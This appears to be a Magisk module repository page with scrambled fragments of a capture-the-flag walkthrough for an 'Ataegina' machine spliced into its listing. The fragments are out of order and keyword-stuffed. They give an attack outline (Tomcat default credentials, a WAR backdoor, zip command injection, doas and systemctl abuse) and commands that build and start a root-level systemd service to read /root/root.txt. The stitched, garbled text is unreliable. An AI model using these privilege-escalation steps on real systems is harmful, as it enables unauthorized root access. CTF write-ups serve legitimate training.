IzzyOnDroid Magisk Repository

IzzyOnDroid repoThis is a repository for open-source Magisk Modules which is run by by IzzyOnDroid (details), currently serving 139 modules. To add it to your MMRL client, use this URL:
 

https://apt.izzysoft.de/magisk

Note this repo is still in BETA stage, so there might be some glitches and not everything is working as planned yet! Further, other than with our F-Droid repo, there is no extensive scanning framework in place. Modules are taken in directly from their resp. developers.

Last updated: 2026-03-06 20:33 UTC

Filter:  
Category
License
AntiFeatures
Added since
Updated since
LastBuild since
Do it!
Clear clean
139 modules found

Ataegina Walkthrough Access

cat /tmp/root_flag THMataegina_root_flag | Step | Technique | |------|------------| | Recon | Nmap, dirbusting | | Initial access | Tomcat manager default creds → WAR backdoor | | User pivot | sudo zip command injection | | Root | doas misconfiguration + systemctl abuse | Key takeaway: Always check default credentials, cronjobs, sudo/doas rights, and unusual SUID binaries.

Here’s a structured for a CTF machine or challenge named “Ataegina” (likely from a platform like HackTheBox, VulnHub, or TryHackMe). ataegina walkthrough

doas -u root systemctl link /tmp/root.service doas -u root systemctl start root.service Retrieve flag: ataegina walkthrough

cat <<EOF > /tmp/root.service [Service] ExecStart=/bin/bash -c 'cat /root/root.txt > /tmp/root_flag' [Install] WantedBy=multi-user.target EOF Run as root via doas: ataegina walkthrough

|« «
Modules per page: 10 25 50 100
» »|